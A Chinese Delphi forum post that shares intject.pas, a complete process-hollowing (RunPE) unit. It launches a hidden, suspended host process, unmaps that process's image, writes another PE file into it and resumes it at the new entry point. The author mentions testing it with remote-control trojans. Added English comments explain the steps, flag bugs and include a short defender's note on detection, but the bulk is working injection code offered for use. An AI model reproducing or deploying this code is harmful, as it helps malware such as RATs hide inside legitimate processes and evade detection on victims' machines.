
[Delphi文章] 注入WIN7的单元 







EXE整体注入,一般的程序可以正常使用,远控貌似一调用线程,就。。。
反正远控上,我测试,除非套接字,原始连接,然后不调用线程,直接执行函数,不然不上线。
没意思,鸡肋,食之无味弃之可惜

intject.pas

unit intject;
interface
uses
Windows;
var
// Not linked statically (the 'external' line below is kept commented out);
// InTo resolves it from ntdll.dll with GetProcAddress at runtime. It unmaps a
// mapped section (here: the target's own executable image) from ProcessHandle.
ZwUnmapViewOfSection:function(ProcessHandle:thandle; BaseAddress:Pointer):LongInt; stdcall;
// Function-pointer mirror of CreateProcessA/CreateProcessW; InTo fills it from
// kernel32.dll at runtime (which one depends on the UNICODE define).
CreateProcessX:function(lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
//external 'ntdll.dll' name 'ZwUnmapViewOfSection';
type
// Typed view of a PE section table. 96 matches the section-count limit the
// Windows loader itself enforces; note that InTo's section loop indexes this
// array by FileHeader.NumberOfSections without checking it against the bound.
PImageSectionHeaders = ^TImageSectionHeaders;
TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
// path  - PE file whose image is injected.
// path1 - command line of the host process to create (see InTo).
procedure InJect(path,path1:string);
implementation

function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
var
  OptionalHeaderStart: Cardinal;
begin
  // The section table starts immediately after the optional header. Its
  // length is not fixed, so it is taken from FileHeader.SizeOfOptionalHeader.
  // Cardinal arithmetic: this unit is 32-bit only, like the rest of InTo.
  OptionalHeaderStart := Cardinal(@NTHeader^.OptionalHeader);
  Result := PImageSectionHeader(OptionalHeaderStart + NTHeader^.FileHeader.SizeOfOptionalHeader);
end;

function Protect(Characteristics: ULONG): ULONG;
begin
  // Only the top three bits of the IMAGE_SCN_* characteristics are used:
  // bit 29 (execute), bit 30 (read), bit 31 (write), read as a 3-bit index
  // in that order. Every other characteristic bit is ignored.
  case Characteristics shr 29 of
    0: Result := PAGE_NOACCESS;
    1: Result := PAGE_EXECUTE;
    2: Result := PAGE_READONLY;
    3: Result := PAGE_EXECUTE_READ;
    4, 6: Result := PAGE_READWRITE;          // write-only and write+read both map to RW
    5, 7: Result := PAGE_EXECUTE_READWRITE;  // any writable+executable combination
  else
    Result := PAGE_NOACCESS;                 // unreachable: the index is 3 bits wide
  end;
end;

{ Tries to enable SeDebugPrivilege in the current process's own token.
  Best-effort: every failure is silent, the result of AdjustTokenPrivileges
  is not inspected, and the token handle is never closed (as in the original). }
procedure SetPrivilege;
var
  Token: THandle;
  Privs: TTokenPrivileges;
  DebugLuid: TLargeInteger;
  ReturnLen: DWORD;
begin
  // Only the adjust right is requested; no previous-state buffer is asked for.
  if not OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, Token) then
    Exit;
  if not LookupPrivilegeValue(nil, 'SeDebugPrivilege', DebugLuid) then
    Exit;
  Privs.PrivilegeCount := 1;
  Privs.Privileges[0].Luid := DebugLuid;
  Privs.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;  // = 2
  ReturnLen := 0;
  AdjustTokenPrivileges(Token, False, Privs, SizeOf(TTokenPrivileges), nil, ReturnLen);
end;

{ Creates a suspended instance of ProcessName, removes that process's own
  executable image and writes the PE image held in Buffer in its place, then
  points the initial thread at the new entry point and resumes it. This is
  the technique usually called process hollowing / RunPE.
  Buffer      - raw bytes of a PE file (InJect reads it from disk).
  ProcessName - passed as lpCommandLine to CreateProcess.
  No result and no error reporting: most API return values are ignored.
  32-bit x86 only: TContext.Eax/Ebx/Seg* and Cardinal pointer arithmetic.
  Defender's note: the call sequence CREATE_SUSPENDED -> ZwUnmapViewOfSection
  -> WriteProcessMemory of headers and sections -> SetThreadContext ->
  ResumeThread is the canonical hollowing pattern that host-based detection
  (API/ETW telemetry, memory scans for unbacked executable regions) keys on. }
procedure InTo(Buffer: Pointer; ProcessName: String);
Var
ProcessInfo           :TProcessInformation;
StartupInfo           :TStartupInfo;
Context               :TContext;
BaseAddress           :Pointer;
BytesRead             :DWORD;
BytesWritten          :DWORD;
I                     :ULONG;
OldProtect            :ULONG;
NTHeaders             :PImageNTHeaders;
Sections              :PImageSectionHeaders;
Kernel,ntdll:LongWord;
Begin

// Both structures start zeroed; ProcessInfo therefore holds zero handles if
// CreateProcessX below fails, and the later calls run on those anyway.
FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
fillChar(StartupInfo, SizeOf(TStartupInfo),        0);
StartupInfo.cb := SizeOf(TStartupInfo);
StartupInfo.wShowWindow := SW_HIDE;
// Resolve CreateProcessA/W at runtime instead of importing it statically.
// NOTE(review): the non-UNICODE branch calls LoadLibraryW while the UNICODE
// branch calls LoadLibrary; both load the same DLL, so the asymmetry looks
// accidental rather than meaningful.
{$IFDEF UNICODE}
Kernel:=LoadLibrary('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessW');
{$ELSE}
Kernel:=LoadLibraryW('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessA');
{$ENDIF}
// ZwUnmapViewOfSection is not in the import libraries; fetched by name.
ntdll:=LoadLibrary('ntdll.dll');
ZwUnmapViewOfSection:=GetProcAddress(ntdll,'ZwUnmapViewOfSection');
// Enables SeDebugPrivilege in our own token; presumably a leftover, since the
// child below is created by us and its handles come back with full access.
SetPrivilege;
// Host process is created suspended so its initial thread never runs the
// original image. Return value not checked.
CreateProcessX(nil,PChar(ProcessName), NIL, NIL, false, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo);
FreeLibrary(Kernel);
// Only the integer registers are requested; Ebx is what the next line needs.
Context.ContextFlags := CONTEXT_INTEGER;
GetThreadContext(ProcessInfo.hThread, Context);
// Reads a pointer at Ebx+8 in the child. This relies on an undocumented x86
// start-up convention (Ebx pointing at the PEB, whose image-base pointer sits
// at offset 8) - verify against the target OS before assuming it holds.
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead);
// Unmaps the host's original executable image from its address space.
ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress);
// On this exit the host is left alive, suspended and already unmapped; the
// process/thread handles are not closed on any path out of this procedure.
if not Assigned(Buffer) then exit;
// No validation of the DOS/NT signatures or of Buffer's length: e_lfanew is
// trusted as-is.
NTHeaders:= PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
// The image is placed at its preferred ImageBase only; there is no relocation
// handling, so if that range is unavailable the allocation fails and we exit.
BaseAddress:= VirtualAllocEx(ProcessInfo.hProcess, Pointer(NTHeaders.OptionalHeader.ImageBase), NTHeaders.OptionalHeader.SizeOfImage,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE);
If not Assigned(BaseAddress) then exit;
// Headers first, then each section's raw data at its RVA, then page
// protection derived from the section characteristics (see Protect).
WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer, NTHeaders.OptionalHeader.SizeOfHeaders,BytesWritten);
Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
// NumberOfSections is not checked against the 96-entry bound of
// TImageSectionHeaders.
For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
begin
    WriteProcessMemory(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+Sections[I].VirtualAddress), Pointer(Cardinal(Buffer) + Sections[I].PointerToRawData), Sections[I].SizeOfRawData, BytesWritten);
    VirtualProtectEx(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+ Sections[I].VirtualAddress),Sections[I].Misc.VirtualSize,
    Protect(Sections[I].Characteristics),OldProtect);
end;
// Write the new image base back to the same Ebx+8 location read above.
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesWritten);
// Eax is the register the x86 thread start-up stub presumably jumps through;
// it is redirected to the injected image's entry point.
Context.Eax := ULONG(BaseAddress)+NTHeaders.OptionalHeader.AddressOfEntryPoint;
// NOTE(review): ContextFlags is still CONTEXT_INTEGER, which covers the
// general-purpose registers only. The segment selectors and EFlags below
// belong to CONTEXT_SEGMENTS / CONTEXT_CONTROL, so SetThreadContext most
// likely does not apply them - these look like dead writes.
Context.SegGs:=0;
Context.SegFs:=$38;
Context.SegEs:=$20;
Context.SegDs:=$20;
Context.SegSs:=$20;
Context.SegCs:=$18;
Context.EFlags:=$3000;
FreeLibrary(ntdll);
// If the context cannot be installed the half-built host is killed;
// otherwise its initial thread is released to run the injected image.
if not SetThreadContext(ProcessInfo.hThread, Context) then
        TerminateProcess(ProcessInfo.hProcess, 0)
Else resumeThread(ProcessInfo.hThread);
End;

{ Reads the whole file at 'path' into a heap buffer and hands it to InTo,
  which creates a new instance of 'path1' and replaces its image with it.
  path  - PE file to inject; opened read-only with FILE_SHARE_READ.
  path1 - command line of the host process, forwarded to CreateProcess.
  None of the CreateFile/GetFileSize/ReadFile results are checked: a failed
  open yields INVALID_HANDLE_VALUE and the calls that follow run on it
  regardless (GetFileSize then reports INVALID_FILE_SIZE). The file handle
  and the buffer are released only after InTo returns. }
procedure InJect(path,path1:string);
var
   BytesRead, Module, Size: dword;   // Module is a file handle, not an HMODULE
   Data: pointer;
begin
    Module := CreateFile(pchar(path), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
    Size := GetFileSize(Module, nil);
    GetMem(Data, size);
    ReadFile(Module, Data^, size, BytesRead, nil);
    // InTo receives the raw file image; it parses the PE headers itself.
    InTo(data,path1);
    CloseHandle(Module);
    freemem(data);
end;
end.

 


发帖时间:2016-7-9   |   查看数:0   |   回复数:0